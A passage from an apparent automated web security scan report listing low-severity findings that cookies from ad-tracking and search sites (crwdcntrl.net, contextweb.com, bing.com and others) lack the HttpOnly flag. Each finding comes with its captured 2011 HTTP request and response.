Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhK3HSTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIOZLqLDEJccj%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KAAzXFWI%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:50 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

14.37. http://bcp.crwdcntrl.net/4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=653530971%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwU30RwcDAaOgiPEuXwYiBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKXIOYgSNzDFFwZR8glM8X6DmHIIrJLnPZgSKwILCn6FyO2EqGSG8HZBbN8DUdkJEdwP4XVDVEpDBBdC%2FMAHcQvESWLiYJVC1yC%2BhdjHxgvmSNyHOFAUTInvA1MCx8GU0DMIVQyhSiBKVMHaeU0hvFUQVx8AC0p4Qaz1BxIAv7IubQ%3D%3D; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1RcR%2FzeeOM3AwGjoIjxLFyTGwCvwvY2JgUGSgeE%2FiOsJpBkZGIEMIGb031XEyMDEcXH6fxCvgeGY%2F64SVAGBb7tRBG4J%2FNDHaZzAD208cuq45b5dxSmXUFGF6qKEihp0gSxUAWFVJzzGTUFVzOAbdiabhYHh7N5msHLJBqA2oHoLIM0IVPMFwhf8PpuZgUFpy36w4FkgDTISYgeQoRSo4sQMN4TRElWz1h5T3JJpVQEg6yEcmKvRrQ87U4HbBJn%2FR%2FBJnibsO%2F9dBYQVhZ0pgDmUAadDA1Wi8YWDAm5Jwe9tzHDj0SUDVWIIO1DW7CIHSFELOCSVgDRQEm4S2MFomhhhaYERmk4YgQlHCciW0y%2FH7dIA3n3Ussf7Swm%2B4JLBLRm4iJlajtDaI4HbHoX9zfhcKEo4WrjqG6jlUjfrc8i5EGYvODeCzFbY347bsf75e%2FFqdrM%2Bi1uz95d0fJJpuCXlDLfglhRWs8TrJmE1PCWH95d8vJoVk78Tjp2gaiZc2Y4BGGTrCGf5MOEMfMnnDR7JDfyEHehmvRC3CW7Wi3BLhvbMxKdzNW7JMOFKfOnoKDGu3o7PhMO4JeNZduNzWAFuyUTLc4RrEvkZfMSU4lJ4U1Y8yx4i6gvVSsKKUu%2FLEnazwiU84eX14jqyCdisYWDgap1ErTIoUEUJT6msooxbUnFZHeEAkfm%2Fn7CiQBVtvPHj9eIG7kzt9eIWbkllAQd86fYZnsy8%2Fj8xDjfA0xJSI6IlpLD%2FGm4T%2BCreUiua%2FfNf4InJWTcJ%2BzXp5CnCiqLfpuK2BgBk%2BzD3; OAID=aa8272d1805895ab786afc266fb574e9

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:26:04 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU30Ry8DAaOgivLqBwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPrEiiCOeA%2Fm8f4B81ilwJTgV4jKnRDtzBDeLojL9kC0d0IE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQjxmCvHRAUhgrYK4xR9ikReQAAD3BjOG; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rex%2FzeeOMbAwGjoIry6ASTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIGZJqLDEJcck%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacv%2B%2F4xAgbNAGiQJUQ1kKIWdyWYBiu9tBuuWbGAAyTNaAGmQ%2Bi8QfqCKEzNcEaMlqqTWHlPckmlVASDjIRyYI9GNDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRS3gkFQC0kBJuElgh6NpAtJMHBeng%2FngZMEITCdKQLacfjlulwbw7qOWPd5fSvAlGxnckoGLmKnlCK09ErjtUdjfjM%2BFooSjhau%2BgVoudbM%2Bh5xVYfaCsyzIbP%2F8vXjlFfa34%2FaMm%2FVZ3JLeX9LxSabhlpQz3IJbUljNEq%2BDc07OBIaFKTgMgNbk41UsrIanmAmqZsKVvRgYFJO%2FE45H%2F%2Fx1hMsBhf1v8JQkwhl4EtoGfsJucLNeiC8CF%2BGWDO2ZiU%2FnanyursQt6Z9%2FlBhXb8dnwmHckvEsu%2FE5rAC3ZKLlOcLVivwMPsJRGqgihTfZxbPsIRwEYaqVhBWl3pcl7GaFS3jCy%2BvFdWQTsFnDwMDVOolaBVKgihKeIlpFGbek4rI6wgEi838%2FMZW3Nt748XpxA3fO93pxC7eksoADvnT7DE9mXv%2BfGIcb4GkWqRHRLFLYfw23CXwVb6kVzf75L%2FDE5KybhP0KANnJFP8%3D; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:26:05 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

14.38. http://bcp.crwdcntrl.net/4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=73%7Crand=844124749%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://support.gamehouse.com/app/answers/detail/a_id/861/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=aa8272d1805895ab786afc266fb574e9; aud=ABR4nGNgYGDwU33RxcDAaOgiEtfAYM3AIKDEAAa9YJLnMoS6Cab4KxsYGhgYmNdAeFVgnmgimCeaABH8C6Y4jMCU2GMwxTUDrFK8AMwTOQdR6Qam%2BMIgKj%2BBKd5vEF4lxMxDYH28fyCOeA%2FmiRWBeaxSYErwK0TlToh2ZghvF8RleyAaOiGC%2ByG8bohKaYjgQojRfGBKoBDiXIirxcTBGoSuQQIEYjsbL5gjcR9CBYIpSScI5QjxkSiYEt8HMfM4mBJ6BqGKIUZvgfBKICpVId40hfBWQTx2ACwo4QVxkj%2BQAADFoDNn; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rdd%2FzeemMnAwGjoIhLXABJj4BH43sbEwCDJwPAfxPUE0owMjEAGEPMmVFjikuOWfm6KU07ghz5OMwV%2BaOOW%2B3YFt5nfruIxUx2PH0LwmHkKp1xCRSpOOWFVJ5z2MfiEnclmYWA4u7cZLCvZAFQFlLYA0oxABV8gfMHvs5kZGJS27AcLngXSIBMgRgIZSoEqTsxwQxgtUTVr7THFLZlWFQCyHsKBORLd%2BrAzFbhNkPl%2FBJ%2FkacK%2B899VQFhR2JkCmEMZcDo0UCUaXzgo4JYU%2FN7GDDceXTJQJYawA2XNLnKAFLWAQ1IJSAMl4SaBHYymCUgzcVycDuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcEXXDK4JQMXMVPLEVp7JHDbo7C%2FGZ8LRQlHC1d9A7Vc6mZ9DjkXwuwF50aQ2Qr723E71j9%2FL17NbtZncWv2%2FpKOTzINt6Sc4RbcksJqlnjdJKyGp%2BTw%2FpKPV3POyZnAgDQFByCDYvJ3wlEVVM2EKw8yAMNvHeH8HyacgS8tvcEjuYGfsAPdrBfiNsHNehFuydCemfh0rsYtGSZciS9RHSXG1dvxmXAYt2Q8y258DivALZloeY5wtSI%2Fg4%2BYIl0KbzKLZ9lDROWhWklYUep9WcJuVriEJ7y8XlxHNgGbNQwMXK2TqFUgBaoo4SmiVZRxSyouqyMcIDL%2F9xNWFKiijTd%2BvF7cwJ2pvV7cwi2pLOCAL90%2Bw5OZ1%2F8nxuEGeJpFakQ0ixT2X8NtAl%2FFW2pFs3%2F%2BCzwxOesmYb8CABGbFR8%3D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:27:36 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Content-Type: text/html; charset=UTF-8
Set-Cookie: aud=ABR4nGNgYGDwU32xg4GB0dBFVGAjgzUDg4ASAxj0gkmeyxDqJpjir2xgaGBgYF4D4VWBeaKJYJ5oAkTwL5jiMAJTYo%2FBFNcMsErxAjBP5BxEpRuY4guDqPwEpni%2FQXiVEDMPgfWJFUEc8R7M4%2F0D5rFKgSnBrxCVOyHamSG8XRCX7YFo74QI7ofwuiEqpSGCCyFG84EpgUKIcyGuFhMHaxC6BgkQiO1svGCOxH0IFQimJJ0glCPER6JgSnwfxMzjYEroGYQqhhi9BcIrgahUhXjMFOKjA5DAWgVxiz%2FEIi8gAQDkJzN5; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Set-Cookie: cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIiqwESTGwCPwvY2JgUGSgeE%2FiOsJpBkZGIEMIBZPqLDEJScq%2FdwUp5zAD32cZgr80MYt9%2B0KbjO%2FXcVjpjoeP4TgMfMUTrmEilSccsKqTjjtY%2FAR%2FD6bmYFBacu%2B%2F4xAgbNAGiQp%2Bf8%2FUDWQoRR2JpsFKL63CaxbsoEBJM9oAaRB6r9A%2BIEqTsxwRYyWqJJae0xxS6ZVBYCMh3Cg1mIYH3amArcJMv%2BP4JM8TYzro3GbEHamAOZABpwO9N9VQNgarT0KuK0R%2FN7GDLcGXTJQJYaw8bJmFzlAiprBIakEpIGScJPA0Y%2BmCUgzcVycBuaDkwUjMJ0oAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwAGuycR; Domain=.crwdcntrl.net; Expires=Sat, 14-Apr-2012 20:27:36 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 643
Connection: close

<html>
<body leftmargin='0' topmargin='0' marginwidth='0' marginheight='0' style='background-color:transparent; width: 100%; text-align: center;'>
<html><body><div><!-- Begin comScore Tag --> <script>
...[SNIP]...

14.39. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=536088&ev=2814750682866683&rurl=http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb%26can=ffffffffffffffff HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; V=8vciuQJMXXJY; cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B08%2F12%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 13-Jul-2012 18:37:29 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0; Domain=.contextweb.com; Expires=Wed, 18-Jul-2012 18:37:29 GMT; Path=/
Location: http://matcher-cwb.bidder7.mookie1.com/do-association?return=ctxweb&can=ffffffffffffffff
Content-Type: text/html; charset=iso-8859-1
Content-Length: 0
Date: Tue, 19 Jul 2011 18:37:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"


14.40. http://bing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110514; _UR=OMW=1; s_nr=1306591010561; _msaId=d8678782_61_15534038; _FP=; SRCHD=MS=1848248&SM=1&D=1769857&AF=BMMENO; MUID=E361C23374E642C998D8ABA7166A75EC

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Content-Length: 0
Location: http://www.bing.com/
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
Edge-control: no-store
Set-Cookie: _HOP=I=1&TS=1311085458; domain=bing.com; path=/
Date: Tue, 19 Jul 2011 14:24:17 GMT


14.41. http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bing.fansnap.com
Path:   /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html HTTP/1.1
Host: bing.fansnap.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/events/search?q=U2+with+Interpol+(rescheduled+from+7%2f19)&p1=[Events%20source=%22vertical%22+qzeventid=%22f389669%22]&FORM=DTPEVE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bg_ver=1; bg_vid=1342566830275585; bg_lvd=1311100420
If-None-Match: "1237402bfa716d1b23edce2a34ba2262"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:34:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 424
ETag: "13894ec26df92ffcfe8a7d45e8580ead"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: bg_lvd=1311104083; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 19:34:43 GMT
Set-Cookie: _fancat_session=BAh7EjoPc2Vzc2lvbl9pZCIlMDE4M2Q1OWNmMDhkNzQ1OTM2YmM3MzY2ZWUzMzhhYjc6DmJnX3NyY19pZEkiCTE5ODcGOgZFVDoPYmdfc3JjX2tleSILRFRQRVZFOgpiZ19scEkiAZlodHRwOi8vYmluZy5mYW5zbmFwLmNvbS91Mi10aWNrZXRzL3UyLXdpdGgtaW50ZXJwb2wtcmVzY2hlZHVsZWQtZnJvbS03MTkvanVseS0yMC0yMDExLTM4OTY2OT91dG1fc291cmNlPTE5ODcmYWNrPWh0dHAlM2ElMmYlMmZ3d3cuYmluZy5jb20lMmZzJTJmYWNrLmh0bWwGOwdGOg9iZ19yZWZlcmVyIgGWaHR0cDovL3d3dy5iaW5nLmNvbS9ldmVudHMvc2VhcmNoP3E9VTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpJnAxPVtFdmVudHMlMjBzb3VyY2U9JTIydmVydGljYWwlMjIrcXpldmVudGlkPSUyMmYzODk2NjklMjJdJkZPUk09RFRQRVZFOhBiZ19rZXl3b3JkcyIvVTIrd2l0aCtJbnRlcnBvbCsocmVzY2hlZHVsZWQrZnJvbSs3JTJmMTkpOhBiZ192aXNpdF9pZGkEIRfNFToSYmdfdmlzaXRvcl9pZCIVMTM0MjU2NjgzMDI3NTU4NToRYmdfc3R5bGVfaWRzSSIABjsHRjoLYmdfbG9jewo6CGxhdGYaMzIuNzgyNDk5OTk5OTk5OTk5AI9cOghsbmdmGy05Ni44MjA3MDAwMDAwMDAwMDIA9PE6EG1hcmtldF9hcmVhaRI6EWRpc3BsYXlfbmFtZSIWRGFsbGFzLUZvcnQgV29ydGg6FG1hX2Rpc3BsYXlfbmFtZUAROhBzcHZfc3JjXzcwMVQ6Emxhc3RfYWNjZXNzZWRJdToJVGltZQ1z2huA5nTDigY6C29mZnNldGn%2BkJ06EXNwdl9zcmNfMTk4N1Q%3D--599dd929144daee7633c9982b135b8d1876ed56b; domain=fansnap.com; path=/; HttpOnly
Status: 200
Vary: Accept-Encoding
Content-Length: 23596
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='en' xml:lang='en' xmlns:fb='http://www.facebook.com/2008/fbml' xml
...[SNIP]...

14.42. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?pixid=99062281 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: bp.specificclick.net

Response

HTTP/1.1 302 Moved Temporarily
Server: WebStar 1.0
Set-Cookie: ug=rBXKI63Fi2POmD; Domain=.specificclick.net; Expires=Sun, 17-Jul-2016 21:00:37 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI NAV"
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Location: http://b.scorecardresearch.com/p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 255
Date: Tue, 19 Jul 2011 21:00:36 GMT

<html>
<head><title>Document moved</title></head>
<body><h1>Document moved</h1>
This document has moved <a href="http://b.scorecardresearch.com/p?c1=8&amp;c2=2101&amp;c3=1234567891234567891&amp;c15
...[SNIP]...

14.43. http://c.atdmt.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.atdmt.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074&RedC=c.bing.com&MXFR=E361C23374E642C998D8ABA7166A75EC HTTP/1.1
Host: c.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1305305557-4079447; MUID=E361C23374E642C998D8ABA7166A75EC; ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877:66c2/2b295; ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b:d42f8c5/2b295/13d4144a/66c2/4e178c27

Response

HTTP/1.1 302 Redirect
Cache-Control: private, no-cache, proxy-revalidate, no-store
Pragma: no-cache
Location: http://c.bing.com/c.gif?DI=15074&MUID=E361C23374E642C998D8ABA7166A75EC&cb=1cc461f8e7da070
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Set-Cookie: MUID=E361C23374E642C998D8ABA7166A75EC; domain=.atdmt.com; expires=Sat, 04-Feb-2012 14:24:23 GMT; path=/;
Date: Tue, 19 Jul 2011 14:24:23 GMT
Content-Length: 0


14.44. http://c.bing.com/c.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.bing.com
Path:   /c.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c.gif?DI=15074 HTTP/1.1
Host: c.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/
